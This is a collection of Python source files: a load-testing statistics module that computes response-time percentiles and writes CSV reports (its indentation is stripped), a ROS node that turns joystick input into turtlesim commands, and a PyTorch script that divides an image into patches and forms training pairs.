"""Space in table for request name. Auto shrink it if terminal is small (<160 characters)"""
try:
STATS_NAME_WIDTH = max(min(os.get_terminal_size()[0] - 80, 80), 0)
except OSError: # not a real terminal
STATS_NAME_WIDTH = 80
STATS_AUTORESIZE = True  # overwrite this if you don't want auto resize while running
def resize_handler(signum, frame):
global STATS_NAME_WIDTH
if STATS_AUTORESIZE:
try:
STATS_NAME_WIDTH = max(min(os.get_terminal_size()[0] - 80, 80), 0)
except OSError: # not a real terminal
pass
try:
signal.signal(signal.SIGWINCH, resize_handler)
except AttributeError:
    pass  # Windows doesn't have SIGWINCH
STATS_TYPE_WIDTH = 8
"""Default interval for how frequently results are written to console."""
CONSOLE_STATS_INTERVAL_SEC = 2
"""Default interval for how frequently results are written to history."""
HISTORY_STATS_INTERVAL_SEC = 5
"""Default interval for how frequently CSV files are written if this option is configured."""
CSV_STATS_INTERVAL_SEC = 1
CSV_STATS_FLUSH_INTERVAL_SEC = 10
"""
Default window size/resolution - in seconds - when calculating the current
response time percentile
"""
CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW = 10
CachedResponseTimes = namedtuple("CachedResponseTimes", ["response_times", "num_requests"])
PERCENTILES_TO_REPORT = [0.50, 0.66, 0.75, 0.80, 0.90, 0.95, 0.98, 0.99, 0.999, 0.9999, 1.0]
class RequestStatsAdditionError(Exception):
pass
def get_readable_percentiles(percentile_list):
"""
Converts a list of percentiles from 0-1 fraction to 0%-100% view for using in console & csv reporting
:param percentile_list: The list of percentiles in range 0-1
:return: The list of string representation for each percentile in 0%-100% view
"""
return [
f"{int(percentile * 100) if (percentile * 100).is_integer() else round(100 * percentile, 6)}%"
for percentile in percentile_list
]
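
# Worked example (the percentile values below are illustrative, not part of the module):
# get_readable_percentiles([0.5, 0.999, 1.0]) returns ['50%', '99.9%', '100%'] --
# whole percentages are rendered as integers, fractional ones keep their decimals.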
def calculate_response_time_percentile(response_times, num_requests, percent):
"""
Get the response time that a certain number of percent of the requests
finished within. Arguments:
response_times: A StatsEntry.response_times dict
num_requests: Number of request made (could be derived from response_times,
but we save some CPU cycles by using the value which we already store)
percent: The percentile we want to calculate. Specified in range: 0.0 - 1.0
"""
num_of_request = int((num_requests * percent))
processed_count = 0
for response_time in sorted(response_times.keys(), reverse=True):
processed_count += response_times[response_time]
if num_requests - processed_count <= num_of_request:
return response_time
# if all response times were None
return 0
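
# Worked example (numbers are illustrative, not taken from the module): with
# response_times = {100: 2, 200: 1, 300: 1} and num_requests = 4,
# calculate_response_time_percentile(response_times, 4, 0.5) walks the keys in
# descending order (300, 200, 100) and returns 200 -- at least half of the
# requests finished within 200 ms -- while percent=0.95 returns 300.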
def diff_response_time_dicts(latest, old):
"""
Returns the delta between two {response_times:request_count} dicts.
Used together with the response_times cache to get the response times for the
last X seconds, which in turn is used to calculate the current response time
percentiles.
"""
new = {}
for t in latest:
diff = latest[t] - old.get(t, 0)
if diff:
new[t] = diff
return new
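
# Worked example (hypothetical dicts): with latest = {100: 5, 200: 2} and
# old = {100: 3}, diff_response_time_dicts(latest, old) returns {100: 2, 200: 2},
# i.e. only the requests logged since `old` was cached.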
class RequestStats:
"""
Class that holds the request statistics. Accessible in a User from self.environment.stats
"""
def __init__(self, use_response_times_cache=True):
"""
:param use_response_times_cache: The value of use_response_times_cache will be set for each StatsEntry()
when they are created. Settings it to False saves some memory and CPU
cycles which we can do on Worker nodes where the response_times_cache
is not needed.
"""
self.use_response_times_cache = use_response_times_cache
self.entries: dict[str, StatsEntry] = {}
self.errors: dict[str, StatsError] = {}
self.total = StatsEntry(self, "Aggregated", None, use_response_times_cache=self.use_response_times_cache)
self.history = []
@property
def num_requests(self):
return self.total.num_requests
@property
def num_none_requests(self):
return self.total.num_none_requests
@property
def num_failures(self):
return self.total.num_failures
@property
def last_request_timestamp(self):
return self.total.last_request_timestamp
@property
def start_time(self):
return self.total.start_time
def log_request(self, method, name, response_time, content_length):
self.total.log(response_time, content_length)
self.get(name, method).log(response_time, content_length)
def log_error(self, method, name, error):
self.total.log_error(error)
self.get(name, method).log_error(error)
# store error in errors dict
key = StatsError.create_key(method, name, error)
entry = self.errors.get(key)
if not entry:
entry = StatsError(method, name, error)
self.errors[key] = entry
entry.occurred()
def get(self, name, method):
"""
Retrieve a StatsEntry instance by name and method
"""
entry = self.entries.get((name, method))
if not entry:
entry = StatsEntry(self, name, method, use_response_times_cache=self.use_response_times_cache)
self.entries[(name, method)] = entry
return entry
def reset_all(self):
"""
Go through all stats entries and reset them to zero
"""
self.total.reset()
self.errors = {}
for r in self.entries.values():
r.reset()
self.history = []
def clear_all(self):
"""
Remove all stats entries and errors
"""
self.total = StatsEntry(self, "Aggregated", None, use_response_times_cache=self.use_response_times_cache)
self.entries = {}
self.errors = {}
self.history = []
def serialize_stats(self):
return [
self.entries[key].get_stripped_report()
for key in self.entries.keys()
if not (self.entries[key].num_requests == 0 and self.entries[key].num_failures == 0)
]
def serialize_errors(self):
return dict([(k, e.to_dict()) for k, e in self.errors.items()])
class StatsEntry:
"""
Represents a single stats entry (name and method)
"""
def __init__(self, stats: RequestStats, name: str, method: str, use_response_times_cache=False):
self.stats = stats
self.name = name
""" Name (URL) of this stats entry """
self.method = method
""" Method (GET, POST, PUT, etc.) """
self.use_response_times_cache = use_response_times_cache
"""
If set to True, the copy of the response_time dict will be stored in response_times_cache
every second, and kept for 20 seconds (by default, will be CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + 10).
We can use this dict to calculate the *current* median response time, as well as other response
time percentiles.
"""
self.num_requests = 0
""" The number of requests made """
self.num_none_requests = 0
""" The number of requests made with a None response time (typically async requests) """
self.num_failures = 0
""" Number of failed request """
self.total_response_time = 0
""" Total sum of the response times """
self.min_response_time = None
""" Minimum response time """
self.max_response_time = 0
""" Maximum response time """
self.num_reqs_per_sec = {}
""" A {second => request_count} dict that holds the number of requests made per second """
self.num_fail_per_sec = {}
""" A (second => failure_count) dict that hold the number of failures per second """
self.response_times = {}
"""
A {response_time => count} dict that holds the response time distribution of all
the requests.
The keys (the response time in ms) are rounded to store 1, 2, ... 9, 10, 20. .. 90,
100, 200 .. 900, 1000, 2000 ... 9000, in order to save memory.
This dict is used to calculate the median and percentile response times.
"""
self.response_times_cache = None
"""
If use_response_times_cache is set to True, this will be a {timestamp => CachedResponseTimes()}
OrderedDict that holds a copy of the response_times dict for each of the last 20 seconds.
"""
self.total_content_length = 0
""" The sum of the content length of all the requests for this entry """
self.start_time = 0.0
""" Time of the first request for this entry """
self.last_request_timestamp = None
""" Time of the last request for this entry """
self.reset()
def reset(self):
self.start_time = time.time()
self.num_requests = 0
self.num_none_requests = 0
self.num_failures = 0
self.total_response_time = 0
self.response_times = {}
self.min_response_time = None
self.max_response_time = 0
self.last_request_timestamp = None
self.num_reqs_per_sec = {}
self.num_fail_per_sec = {}
self.total_content_length = 0
if self.use_response_times_cache:
self.response_times_cache = OrderedDict()
self._cache_response_times(int(time.time()))
def log(self, response_time, content_length):
# get the time
current_time = time.time()
t = int(current_time)
if self.use_response_times_cache and self.last_request_timestamp and t > int(self.last_request_timestamp):
# see if we shall make a copy of the response_times dict and store in the cache
self._cache_response_times(t - 1)
self.num_requests += 1
self._log_time_of_request(current_time)
self._log_response_time(response_time)
# increase total content-length
self.total_content_length += content_length
def _log_time_of_request(self, current_time):
t = int(current_time)
self.num_reqs_per_sec[t] = self.num_reqs_per_sec.setdefault(t, 0) + 1
self.last_request_timestamp = current_time
def _log_response_time(self, response_time):
if response_time is None:
self.num_none_requests += 1
return
self.total_response_time += response_time
if self.min_response_time is None:
self.min_response_time = response_time
self.min_response_time = min(self.min_response_time, response_time)
self.max_response_time = max(self.max_response_time, response_time)
        # to avoid too much data that has to be transferred to the master node when
# running in distributed mode, we save the response time rounded in a dict
# so that 147 becomes 150, 3432 becomes 3400 and 58760 becomes 59000
if response_time < 100:
rounded_response_time = round(response_time)
elif response_time < 1000:
rounded_response_time = round(response_time, -1)
elif response_time < 10000:
rounded_response_time = round(response_time, -2)
else:
rounded_response_time = round(response_time, -3)
# increase request count for the rounded key in response time dict
self.response_times.setdefault(rounded_response_time, 0)
self.response_times[rounded_response_time] += 1
def log_error(self, error):
self.num_failures += 1
t = int(time.time())
self.num_fail_per_sec[t] = self.num_fail_per_sec.setdefault(t, 0) + 1
@property
def fail_ratio(self):
try:
return float(self.num_failures) / self.num_requests
except ZeroDivisionError:
if self.num_failures > 0:
return 1.0
else:
return 0.0
@property
def avg_response_time(self):
try:
return float(self.total_response_time) / (self.num_requests - self.num_none_requests)
except ZeroDivisionError:
return 0
@property
def median_response_time(self):
if not self.response_times:
return 0
median = median_from_dict(self.num_requests - self.num_none_requests, self.response_times) or 0
# Since we only use two digits of precision when calculating the median response time
        # while still using the exact values for min and max response times, the following check
        # makes sure that we don't report a median > max or median < min when a StatsEntry only
        # has one (or very few) really slow requests
if median > self.max_response_time:
median = self.max_response_time
elif median < self.min_response_time:
median = self.min_response_time
return median
@property
def current_rps(self):
if self.stats.last_request_timestamp is None:
return 0
slice_start_time = max(int(self.stats.last_request_timestamp) - 12, int(self.stats.start_time or 0))
reqs = [
self.num_reqs_per_sec.get(t, 0) for t in range(slice_start_time, int(self.stats.last_request_timestamp) - 2)
]
return avg(reqs)
@property
def current_fail_per_sec(self):
if self.stats.last_request_timestamp is None:
return 0
slice_start_time = max(int(self.stats.last_request_timestamp) - 12, int(self.stats.start_time or 0))
reqs = [
self.num_fail_per_sec.get(t, 0) for t in range(slice_start_time, int(self.stats.last_request_timestamp) - 2)
]
return avg(reqs)
@property
def total_rps(self):
if not self.stats.last_request_timestamp or not self.stats.start_time:
return 0.0
try:
return self.num_requests / (self.stats.last_request_timestamp - self.stats.start_time)
except ZeroDivisionError:
return 0.0
@property
def total_fail_per_sec(self):
if not self.stats.last_request_timestamp or not self.stats.start_time:
return 0.0
try:
return self.num_failures / (self.stats.last_request_timestamp - self.stats.start_time)
except ZeroDivisionError:
return 0.0
@property
def avg_content_length(self):
try:
return self.total_content_length / self.num_requests
except ZeroDivisionError:
return 0
def extend(self, other):
"""
Extend the data from the current StatsEntry with the stats from another
StatsEntry instance.
"""
# save the old last_request_timestamp, to see if we should store a new copy
# of the response times in the response times cache
old_last_request_timestamp = self.last_request_timestamp
if self.last_request_timestamp is not None and other.last_request_timestamp is not None:
self.last_request_timestamp = max(self.last_request_timestamp, other.last_request_timestamp)
elif other.last_request_timestamp is not None:
self.last_request_timestamp = other.last_request_timestamp
self.start_time = min(self.start_time, other.start_time)
self.num_requests = self.num_requests + other.num_requests
self.num_none_requests = self.num_none_requests + other.num_none_requests
self.num_failures = self.num_failures + other.num_failures
self.total_response_time = self.total_response_time + other.total_response_time
self.max_response_time = max(self.max_response_time, other.max_response_time)
if self.min_response_time is not None and other.min_response_time is not None:
self.min_response_time = min(self.min_response_time, other.min_response_time)
elif other.min_response_time is not None:
# this means self.min_response_time is None, so we can safely replace it
self.min_response_time = other.min_response_time
self.total_content_length = self.total_content_length + other.total_content_length
for key in other.response_times:
self.response_times[key] = self.response_times.get(key, 0) + other.response_times[key]
for key in other.num_reqs_per_sec:
self.num_reqs_per_sec[key] = self.num_reqs_per_sec.get(key, 0) + other.num_reqs_per_sec[key]
for key in other.num_fail_per_sec:
self.num_fail_per_sec[key] = self.num_fail_per_sec.get(key, 0) + other.num_fail_per_sec[key]
if self.use_response_times_cache:
# If we've entered a new second, we'll cache the response times. Note that there
        # might still be reports from other worker nodes - that contain requests for the same
        # time periods - that haven't been received/accounted for yet. This will cause the cache to
# lag behind a second or two, but since StatsEntry.current_response_time_percentile()
# (which is what the response times cache is used for) uses an approximation of the
# last 10 seconds anyway, it should be fine to ignore this.
last_time = self.last_request_timestamp and int(self.last_request_timestamp) or None
if last_time and last_time > (old_last_request_timestamp and int(old_last_request_timestamp) or 0):
self._cache_response_times(last_time)
def serialize(self):
return {
"name": self.name,
"method": self.method,
"last_request_timestamp": self.last_request_timestamp,
"start_time": self.start_time,
"num_requests": self.num_requests,
"num_none_requests": self.num_none_requests,
"num_failures": self.num_failures,
"total_response_time": self.total_response_time,
"max_response_time": self.max_response_time,
"min_response_time": self.min_response_time,
"total_content_length": self.total_content_length,
"response_times": self.response_times,
"num_reqs_per_sec": self.num_reqs_per_sec,
"num_fail_per_sec": self.num_fail_per_sec,
}
@classmethod
def unserialize(cls, data):
obj = cls(None, data["name"], data["method"])
for key in [
"last_request_timestamp",
"start_time",
"num_requests",
"num_none_requests",
"num_failures",
"total_response_time",
"max_response_time",
"min_response_time",
"total_content_length",
"response_times",
"num_reqs_per_sec",
"num_fail_per_sec",
]:
setattr(obj, key, data[key])
return obj
def get_stripped_report(self):
"""
Return the serialized version of this StatsEntry, and then clear the current stats.
"""
report = self.serialize()
self.reset()
return report
def to_string(self, current=True):
"""
Return the stats as a string suitable for console output. If current is True, it'll show
the RPS and failure rate for the last 10 seconds. If it's false, it'll show the total stats
for the whole run.
"""
if current:
rps = self.current_rps
fail_per_sec = self.current_fail_per_sec
else:
rps = self.total_rps
fail_per_sec = self.total_fail_per_sec
return (" %-" + str(STATS_NAME_WIDTH) + "s %7d %12s | %7d %7d %7d %7d | %7.2f %7.2f") % (
(self.method and self.method + " " or "") + self.name,
self.num_requests,
"%d(%.2f%%)" % (self.num_failures, self.fail_ratio * 100),
self.avg_response_time,
self.min_response_time or 0,
self.max_response_time,
self.median_response_time or 0,
rps or 0,
fail_per_sec or 0,
)
def __str__(self):
return self.to_string(current=True)
def get_response_time_percentile(self, percent):
"""
Get the response time that a certain number of percent of the requests
finished within.
Percent specified in range: 0.0 - 1.0
"""
return calculate_response_time_percentile(self.response_times, self.num_requests, percent)
def get_current_response_time_percentile(self, percent):
"""
Calculate the *current* response time for a certain percentile. We use a sliding
window of (approximately) the last 10 seconds (specified by CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW)
when calculating this.
"""
if not self.use_response_times_cache:
raise ValueError(
"StatsEntry.use_response_times_cache must be set to True if we should be able to calculate the _current_ response time percentile"
)
# First, we want to determine which of the cached response_times dicts we should
# use to get response_times for approximately 10 seconds ago.
t = int(time.time())
        # Since we can't be sure that the cache contains an entry for every second,
        # we'll construct a list of timestamps which we consider acceptable keys to be used
# when trying to fetch the cached response_times. We construct this list in such a way
# that it's ordered by preference by starting to add t-10, then t-11, t-9, t-12, t-8,
# and so on
acceptable_timestamps = []
acceptable_timestamps.append(t - CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW)
for i in range(1, 9):
acceptable_timestamps.append(t - CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW - i)
acceptable_timestamps.append(t - CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + i)
cached = None
for ts in acceptable_timestamps:
if ts in self.response_times_cache:
cached = self.response_times_cache[ts]
break
if cached:
# If we found an acceptable cached response times, we'll calculate a new response
# times dict of the last 10 seconds (approximately) by diffing it with the current
# total response times. Then we'll use that to calculate a response time percentile
# for that timeframe
return calculate_response_time_percentile(
diff_response_time_dicts(self.response_times, cached.response_times),
self.num_requests - cached.num_requests,
percent,
)
# if time was not in response times cache window
return None
def percentile(self):
if not self.num_requests:
raise ValueError("Can't calculate percentile on url with no successful requests")
tpl = f" %-{str(STATS_TYPE_WIDTH)}s %-{str(STATS_NAME_WIDTH)}s %8d {' '.join(['%6d'] * len(PERCENTILES_TO_REPORT))}"
return tpl % (
(self.method, self.name)
+ tuple([self.get_response_time_percentile(p) for p in PERCENTILES_TO_REPORT])
+ (self.num_requests,)
)
def _cache_response_times(self, t):
self.response_times_cache[t] = CachedResponseTimes(
response_times=copy(self.response_times),
num_requests=self.num_requests,
)
# We'll use a cache size of CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + 10 since - in the extreme case -
# we might still use response times (from the cache) for t-CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW-10
# to calculate the current response time percentile, if we're missing cached values for the subsequent
# 20 seconds
cache_size = CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + 10
if len(self.response_times_cache) > cache_size:
# only keep the latest 20 response_times dicts
for i in range(len(self.response_times_cache) - cache_size):
self.response_times_cache.popitem(last=False)
class StatsError:
def __init__(self, method, name, error, occurrences=0):
self.method = method
self.name = name
self.error = error
self.occurrences = occurrences
@classmethod
def parse_error(cls, error):
string_error = repr(error)
target = "object at 0x"
target_index = string_error.find(target)
if target_index < 0:
return string_error
start = target_index + len(target) - 2
end = string_error.find(">", start)
if end < 0:
return string_error
hex_address = string_error[start:end]
return string_error.replace(hex_address, "0x....")
@classmethod
def create_key(cls, method, name, error):
key = "%s.%s.%r" % (method, name, StatsError.parse_error(error))
return hashlib.md5(key.encode("utf-8")).hexdigest()
def occurred(self):
self.occurrences += 1
def to_name(self):
error = self.error
if isinstance(error, CatchResponseError):
# standalone
unwrapped_error = error.args[0]
        elif isinstance(error, str) and error.startswith("CatchResponseError("):
# distributed
length = len("CatchResponseError(")
unwrapped_error = error[length:-1]
else:
# standalone, unwrapped exception
unwrapped_error = repr(error)
return "%s %s: %s" % (self.method, self.name, unwrapped_error)
def to_dict(self):
return {
"method": self.method,
"name": self.name,
"error": StatsError.parse_error(self.error),
"occurrences": self.occurrences,
}
@classmethod
def from_dict(cls, data):
return cls(data["method"], data["name"], data["error"], data["occurrences"])
def avg(values):
return sum(values, 0.0) / max(len(values), 1)
def median_from_dict(total, count):
"""
total is the number of requests made
count is a dict {response_time: count}
"""
pos = (total - 1) / 2
for k in sorted(count.keys()):
if pos < count[k]:
return k
pos -= count[k]
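
# Worked example (hypothetical numbers): median_from_dict(5, {100: 2, 200: 2, 300: 1})
# starts at pos = (5 - 1) / 2 = 2.0, consumes the two requests in the 100 ms bucket
# (pos drops to 0.0) and returns 200, the bucket that holds the middle request.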
def setup_distributed_stats_event_listeners(events, stats):
def on_report_to_master(client_id, data):
data["stats"] = stats.serialize_stats()
data["stats_total"] = stats.total.get_stripped_report()
data["errors"] = stats.serialize_errors()
stats.errors = {}
def on_worker_report(client_id, data):
for stats_data in data["stats"]:
entry = StatsEntry.unserialize(stats_data)
request_key = (entry.name, entry.method)
if request_key not in stats.entries:
stats.entries[request_key] = StatsEntry(stats, entry.name, entry.method, use_response_times_cache=True)
stats.entries[request_key].extend(entry)
for error_key, error in data["errors"].items():
if error_key not in stats.errors:
stats.errors[error_key] = StatsError.from_dict(error)
else:
stats.errors[error_key].occurrences += error["occurrences"]
stats.total.extend(StatsEntry.unserialize(data["stats_total"]))
events.report_to_master.add_listener(on_report_to_master)
events.worker_report.add_listener(on_worker_report)
def print_stats(stats, current=True):
console_logger.info(
(" %-" + str(STATS_NAME_WIDTH) + "s %7s %12s | %7s %7s %7s %7s | %7s %7s")
% ("Name", "# reqs", "# fails", "Avg", "Min", "Max", "Median", "req/s", "failures/s")
)
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
for key in sorted(stats.entries.keys()):
r = stats.entries[key]
console_logger.info(r.to_string(current=current))
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
console_logger.info(stats.total.to_string(current=current))
console_logger.info("")
def print_percentile_stats(stats):
console_logger.info("Response time percentiles (approximated)")
headers = ("Type", "Name") + tuple(get_readable_percentiles(PERCENTILES_TO_REPORT)) + ("# reqs",)
console_logger.info(
(
f" %-{str(STATS_TYPE_WIDTH)}s %-{str(STATS_NAME_WIDTH)}s %8s "
f"{' '.join(['%6s'] * len(PERCENTILES_TO_REPORT))}"
)
% headers
)
separator = (
f'{"-" * STATS_TYPE_WIDTH}|{"-" * STATS_NAME_WIDTH}|{"-" * 9}|{("-" * 6 + "|") * len(PERCENTILES_TO_REPORT)}'
)
console_logger.info(separator)
for key in sorted(stats.entries.keys()):
r = stats.entries[key]
if r.response_times:
console_logger.info(r.percentile())
console_logger.info(separator)
if stats.total.response_times:
console_logger.info(stats.total.percentile())
console_logger.info("")
def print_error_report(stats):
if not len(stats.errors):
return
console_logger.info("Error report")
console_logger.info(" %-18s %-100s" % ("# occurrences", "Error"))
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
for error in stats.errors.values():
console_logger.info(" %-18i %-100s" % (error.occurrences, error.to_name()))
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
console_logger.info("")
def stats_printer(stats):
def stats_printer_func():
while True:
print_stats(stats)
gevent.sleep(CONSOLE_STATS_INTERVAL_SEC)
return stats_printer_func
def sort_stats(stats):
return [stats[key] for key in sorted(stats.keys())]
def stats_history(runner):
"""Save current stats info to history for charts of report."""
while True:
stats = runner.stats
if not stats.total.use_response_times_cache:
break
if runner.state != "stopped":
r = {
"time": datetime.datetime.utcnow().strftime("%H:%M:%S"),
"current_rps": stats.total.current_rps or 0,
"current_fail_per_sec": stats.total.current_fail_per_sec or 0,
"response_time_percentile_95": stats.total.get_current_response_time_percentile(0.95) or 0,
"response_time_percentile_50": stats.total.get_current_response_time_percentile(0.5) or 0,
"user_count": runner.user_count or 0,
}
stats.history.append(r)
gevent.sleep(HISTORY_STATS_INTERVAL_SEC)
class StatsCSV:
"""Write statistics to csv_writer stream."""
def __init__(self, environment, percentiles_to_report):
super().__init__()
self.environment = environment
self.percentiles_to_report = percentiles_to_report
self.percentiles_na = ["N/A"] * len(self.percentiles_to_report)
self.requests_csv_columns = [
"Type",
"Name",
"Request Count",
"Failure Count",
"Median Response Time",
"Average Response Time",
"Min Response Time",
"Max Response Time",
"Average Content Size",
"Requests/s",
"Failures/s",
] + get_readable_percentiles(self.percentiles_to_report)
self.failures_columns = [
"Method",
"Name",
"Error",
"Occurrences",
]
self.exceptions_columns = [
"Count",
"Message",
"Traceback",
"Nodes",
]
def _percentile_fields(self, stats_entry, use_current=False):
if not stats_entry.num_requests:
return self.percentiles_na
elif use_current:
return [int(stats_entry.get_current_response_time_percentile(x) or 0) for x in self.percentiles_to_report]
else:
return [int(stats_entry.get_response_time_percentile(x) or 0) for x in self.percentiles_to_report]
def requests_csv(self, csv_writer):
"""Write requests csv with header and data rows."""
csv_writer.writerow(self.requests_csv_columns)
self._requests_data_rows(csv_writer)
def _requests_data_rows(self, csv_writer):
"""Write requests csv data row, excluding header."""
stats = self.environment.stats
for stats_entry in chain(sort_stats(stats.entries), [stats.total]):
csv_writer.writerow(
chain(
[
stats_entry.method,
stats_entry.name,
stats_entry.num_requests,
stats_entry.num_failures,
stats_entry.median_response_time,
stats_entry.avg_response_time,
stats_entry.min_response_time or 0,
stats_entry.max_response_time,
stats_entry.avg_content_length,
stats_entry.total_rps,
stats_entry.total_fail_per_sec,
],
self._percentile_fields(stats_entry),
)
)
def failures_csv(self, csv_writer):
csv_writer.writerow(self.failures_columns)
self._failures_data_rows(csv_writer)
def _failures_data_rows(self, csv_writer):
for stats_error in sort_stats(self.environment.stats.errors):
csv_writer.writerow(
[
stats_error.method,
stats_error.name,
stats_error.error,
stats_error.occurrences,
]
)
def exceptions_csv(self, csv_writer):
csv_writer.writerow(self.exceptions_columns)
self._exceptions_data_rows(csv_writer)
def _exceptions_data_rows(self, csv_writer):
for exc in self.environment.runner.exceptions.values():
csv_writer.writerow([exc["count"], exc["msg"], exc["traceback"], ", ".join(exc["nodes"])])
class StatsCSVFileWriter(StatsCSV):
"""Write statistics to to CSV files"""
def __init__(self, environment, percentiles_to_report, base_filepath, full_history=False):
super().__init__(environment, percentiles_to_report)
self.base_filepath = base_filepath
self.full_history = full_history
self.requests_csv_filehandle = open(self.base_filepath + "_stats.csv", "w")
self.requests_csv_writer = csv.writer(self.requests_csv_filehandle)
self.stats_history_csv_filehandle = open(self.stats_history_file_name(), "w")
self.stats_history_csv_writer = csv.writer(self.stats_history_csv_filehandle)
self.failures_csv_filehandle = open(self.base_filepath + "_failures.csv", "w")
self.failures_csv_writer = csv.writer(self.failures_csv_filehandle)
self.failures_csv_data_start = 0
self.exceptions_csv_filehandle = open(self.base_filepath + "_exceptions.csv", "w")
self.exceptions_csv_writer = csv.writer(self.exceptions_csv_filehandle)
self.exceptions_csv_data_start = 0
self.stats_history_csv_columns = [
"Timestamp",
"User Count",
"Type",
"Name",
"Requests/s",
"Failures/s",
*get_readable_percentiles(self.percentiles_to_report),
"Total Request Count",
"Total Failure Count",
"Total Median Response Time",
"Total Average Response Time",
"Total Min Response Time",
"Total Max Response Time",
"Total Average Content Size",
]
def __call__(self):
self.stats_writer()
def stats_writer(self):
"""Writes all the csv files for the locust run."""
# Write header row for all files and save position for non-append files
self.requests_csv_writer.writerow(self.requests_csv_columns)
requests_csv_data_start = self.requests_csv_filehandle.tell()
self.stats_history_csv_writer.writerow(self.stats_history_csv_columns)
self.failures_csv_writer.writerow(self.failures_columns)
self.failures_csv_data_start = self.failures_csv_filehandle.tell()
self.exceptions_csv_writer.writerow(self.exceptions_columns)
self.exceptions_csv_data_start = self.exceptions_csv_filehandle.tell()
        # Continuously write data rows for all files
last_flush_time = 0
while True:
now = time.time()
self.requests_csv_filehandle.seek(requests_csv_data_start)
self._requests_data_rows(self.requests_csv_writer)
self.requests_csv_filehandle.truncate()
self._stats_history_data_rows(self.stats_history_csv_writer, now)
self.failures_csv_filehandle.seek(self.failures_csv_data_start)
self._failures_data_rows(self.failures_csv_writer)
self.failures_csv_filehandle.truncate()
            self.exceptions_csv_filehandle.seek(self.exceptions_csv_data_start)
self._exceptions_data_rows(self.exceptions_csv_writer)
self.exceptions_csv_filehandle.truncate()
if now - last_flush_time > CSV_STATS_FLUSH_INTERVAL_SEC:
self.requests_flush()
self.stats_history_flush()
self.failures_flush()
self.exceptions_flush()
last_flush_time = now
gevent.sleep(CSV_STATS_INTERVAL_SEC)
def _stats_history_data_rows(self, csv_writer, now):
"""
Write CSV rows with the *current* stats. By default only includes the
        Aggregated stats entry, but if self.full_history is set to True, a row for each entry will
        be included.
Note that this method differs from the other methods as it appends time-stamped data to the file, whereas the other methods overwrites the data.
"""
stats = self.environment.stats
timestamp = int(now)
stats_entries = []
if self.full_history:
stats_entries = sort_stats(stats.entries)
for stats_entry in chain(stats_entries, [stats.total]):
csv_writer.writerow(
chain(
(
timestamp,
self.environment.runner.user_count,
stats_entry.method or "",
stats_entry.name,
f"{stats_entry.current_rps:2f}",
f"{stats_entry.current_fail_per_sec:2f}",
),
self._percentile_fields(stats_entry, use_current=self.full_history),
(
stats_entry.num_requests,
stats_entry.num_failures,
stats_entry.median_response_time,
stats_entry.avg_response_time,
stats_entry.min_response_time or 0,
stats_entry.max_response_time,
stats_entry.avg_content_length,
),
)
)
def requests_flush(self):
self.requests_csv_filehandle.flush()
def stats_history_flush(self):
self.stats_history_csv_filehandle.flush()
def failures_flush(self):
self.failures_csv_filehandle.flush()
def exceptions_flush(self):
self.exceptions_csv_filehandle.flush()
def close_files(self):
self.requests_csv_filehandle.close()
self.stats_history_csv_filehandle.close()
self.failures_csv_filehandle.close()
self.exceptions_csv_filehandle.close()
def stats_history_file_name(self):
return self.base_filepath + "_stats_history.csv"
|
the-stack_106_16888
|
#!/usr/bin/env python
"""
Node converts joystick inputs into commands for Turtlesim
"""
import rospy
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
from move_circle import move_circle
def joy_listener():
# start node
rospy.init_node("turtlesim_joy", anonymous=True)
# subscribe to joystick messages on topic "joy"
rospy.Subscriber("joy", Joy, tj_callback, queue_size=1)
# keep node alive until stopped
rospy.spin()
# called when joy message is received
def tj_callback(data):
# start publisher of cmd_vel to control Turtlesim
pub = rospy.Publisher("turtle1/cmd_vel", Twist, queue_size=1)
# Create Twist message & add linear x and angular z from left joystick
twist = Twist()
twist.linear.x = data.axes[1]
twist.angular.z = data.axes[0]
# record values to log file and screen
rospy.loginfo("twist.linear: %f ; angular %f", twist.linear.x, twist.angular.z)
# process joystick buttons
if data.buttons[0] == 1: # green button on xbox controller
move_circle()
# publish cmd_vel move command to Turtlesim
pub.publish(twist)
if __name__ == '__main__':
try:
joy_listener()
except rospy.ROSInterruptException:
pass
|
the-stack_106_16889
|
import torch
import torchvision
from PIL import Image
from matplotlib import pyplot as plt
import random
model = torchvision.models.__dict__['vgg19']()
print(model)
img = torch.rand(1,3,256,256)
out = model.features(img)
print(out.size())
import torchvision.transforms as trans
crop = trans.RandomCrop(224)
img = torch.rand(1,3,256,256)
out = crop(img)
print(out.size())
def divide_patches(img, row, col):
patche_size_w = int(img.size[0] / col)
patche_size_h = int(img.size[1] / row)
patches = []
for cnt_i, i in enumerate(range(0, img.size[1], patche_size_h)):
if cnt_i == row:
break
for cnt_j, j in enumerate(range(0, img.size[0], patche_size_w)):
if cnt_j == col:
break
box = (j, i, j+patche_size_w, i+patche_size_h)
patches.append(img.crop(box))
return patches
def display_images(
images: [Image],
row=3, col=3, width=10, height=4, max_images=15,
label_wrap_length=50, label_font_size=8):
if not images:
print("No images to display.")
return
if len(images) > max_images:
print(f"Showing {max_images} images of {len(images)}:")
images=images[0:max_images]
height = max(height, int(len(images)/col) * height)
plt.figure(figsize=(width, height))
for i, image in enumerate(images):
plt.subplot(row, col, i + 1)
plt.imshow(image)
plt.show()
image = Image.open("/mnt/hdd02/shibuya_scramble/image_000294.jpg").convert("RGB")
p = divide_patches(image, 2, 3)
print(len(p))
display_images(p, row=2, col=3)
def create_pos_pair(patches):
idx = random.randint(0, len(patches)-1)
img1 = patches[idx]
img2 = patches[idx]
label = 1
return img1, img2, label
def create_neg_pair(patches):
    idx = random.sample(range(len(patches)), k=2)
img1 = patches[idx[0]]
img2 = patches[idx[1]]
label = 0
return img1, img2, label
def get_img(img):
patches = divide_patches(img, 3, 2)
if random.random() > 0.5:
img1, img2, label = create_pos_pair(patches)
else:
img1, img2, label = create_neg_pair(patches)
return img1, img2, label
res = []
for i in range(10):
img1, img2, label = get_img(image)
flag = False
if img1 == img2:
flag = True
res.append([flag, label])
print(res)
|
the-stack_106_16890
|
#!/usr/bin/env python
